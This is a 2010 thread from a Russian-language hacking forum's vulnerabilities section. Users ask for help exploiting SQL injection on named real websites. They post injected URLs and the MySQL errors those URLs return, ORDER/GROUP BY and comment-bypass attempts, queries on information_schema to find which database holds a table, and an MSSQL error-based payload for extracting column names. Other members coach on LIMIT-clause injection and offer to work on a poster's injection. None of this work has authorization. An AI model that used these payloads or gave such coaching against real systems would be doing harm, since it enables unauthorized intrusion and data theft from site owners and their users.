HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14951  
Старый 30.08.2010, 18:00
durito
Познающий
Регистрация: 06.06.2008
Сообщений: 76
Провел на форуме:
117639

Репутация: 55
Отправить сообщение для durito с помощью ICQ
По умолчанию

подскажите пожалуйста, тут инъекция или что-то на нее похожее?

http://nudistavenue.com/browse/all/18-20%27/all
 
Ответить с цитированием

  #14952  
Старый 30.08.2010, 19:27
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от NorB  
NorB said:
все равно фильтрует=\ эт значит уязвимости нету?
C чего ты взял, что фильтрует? В первом примере твоем никакой фитьтрации я не вижу. Что выдается при %20 или /**/ ?
 
Ответить с цитированием

  #14953  
Старый 30.08.2010, 20:55
NorB
Познающий
Регистрация: 20.07.2007
Сообщений: 99
Провел на форуме:
1562993

Репутация: 25
По умолчанию

Цитата:
Сообщение от попугай  
попугай said:
C чего ты взял, что фильтрует? В первом примере твоем никакой фитьтрации я не вижу. Что выдается при %20 или /**/ ?
Вылазит тоже самое только c %20

SELECT DISTINCT a.ad_id, a.house_ad,a.url,b.filePath FROM advertising a, tddmadmin_file b WHERE a.date_start = now() AND a.status = 'active' AND a.adpage = 'knowledge_center_overview.php?type=2'%20group%20b y%209999%20--%20' AND a.fileid = b.fileID [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%20' AND a.fileid = b.fileID' at line 5]

как видно из запроса мой запрос как параметр передается и комментарий в конце не сканывает поэтому невыполняется, а если кавычку перед запросам убрать то там идет перенаправленние на главную страницу сразу

хм при /**/ тоже перенаправляет на главную страницу.

Карочи вот сайт http://www.wi-fi.org/knowledge_center_overview.php?type=2'

расскажи че там как я просто учусь) за день штук 10 таких бывает)

О и еше вопрос как проверить к какой бд принадлежит таблица если я знаю ее имя.
 
Ответить с цитированием

  #14954  
Старый 30.08.2010, 23:09
mr.celt
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423

Репутация: 32
По умолчанию

Цитата:
Сообщение от NorB  
NorB said:
О и еше вопрос как проверить к какой бд принадлежит таблица если я знаю ее имя.
Если версия mysql > 5, то можно узнать наверняка

select table_schema from informashion_schema.tables where table_name='your_table';

Если такой возможности нет, то удостовериться сделав запрос из этой таблицы, назвав предполагаемую базу:

select * from предполагаемая_база.your_table;

ошибки нет - значит предположение верно
 
Ответить с цитированием

  #14955  
Старый 31.08.2010, 13:48
NorB
Познающий
Регистрация: 20.07.2007
Сообщений: 99
Провел на форуме:
1562993

Репутация: 25
По умолчанию

blablabla.php?start=16600+group+by+2+--+

ошибка

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group by 2 -- ,40' at line 1

как бороться с этим ,40

почему то не комментируется...

mr.celt - спс
 
Ответить с цитированием

  #14956  
Старый 31.08.2010, 14:16
kfor
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095

Репутация: 34
Отправить сообщение для kfor с помощью ICQ
По умолчанию

Цитата:
Сообщение от NorB  
NorB said:
blablabla.php?start=16600+group+by+2+--+
ошибка
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group by 2 -- ,40' at line 1
как бороться с этим
,40
почему то не комментируется...
mr.celt - спс
А это не в Limit ли скуля? можешь попробовать /*

но что то мне подсказывает, что это скуля в limit...
 
Ответить с цитированием

  #14957  
Старый 31.08.2010, 14:48
NorB
Познающий
Регистрация: 20.07.2007
Сообщений: 99
Провел на форуме:
1562993

Репутация: 25
По умолчанию

Цитата:
Сообщение от kfor  
kfor said:
А это не в Limit ли скуля? можешь попробовать /*
но что то мне подсказывает, что это скуля в limit...
Ну похоже ты прав. Можно ли лимит обойти подзапросом или както еще?
 
Ответить с цитированием

  #14958  
Старый 31.08.2010, 14:57
stepashka_
Познавший АНТИЧАТ
Регистрация: 09.11.2009
Сообщений: 1,077
Провел на форуме:
7879791

Репутация: 265


Отправить сообщение для stepashka_ с помощью ICQ
По умолчанию

Цитата:
Сообщение от NorB  
NorB said:
Ну похоже ты прав. Можно ли лимит обойти подзапросом или както еще?
Что именно ты хочешь вывести?

Скинь сюда свою скулю, посмотрим что можно сделать.
 
Ответить с цитированием

  #14959  
Старый 31.08.2010, 14:58
IMMORTAL_S
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603

Репутация: 3
По умолчанию

(MSSQL) Что не так с запросом?

Код:
Code:
1' or 1=(SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='pass')--
пытаюсь вытянуть имена колонок определенной таблицы, но выводятся колонки всех таблиц (ну т.е. какую бы таблицу не указал, выводятся одни и те же колонки).. вроде бы понятно объяснил
 
Ответить с цитированием

  #14960  
Старый 31.08.2010, 15:09
NorB
Познающий
Регистрация: 20.07.2007
Сообщений: 99
Провел на форуме:
1562993

Репутация: 25
По умолчанию

Цитата:
Сообщение от stepashka_  
stepashka_ said:
Что именно ты хочешь вывести?
Скинь сюда свою скулю, посмотрим что можно сделать.
http://tradebanging.com/community.php?start=-166000
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
 


Быстрый переход




ANTICHAT.XYZ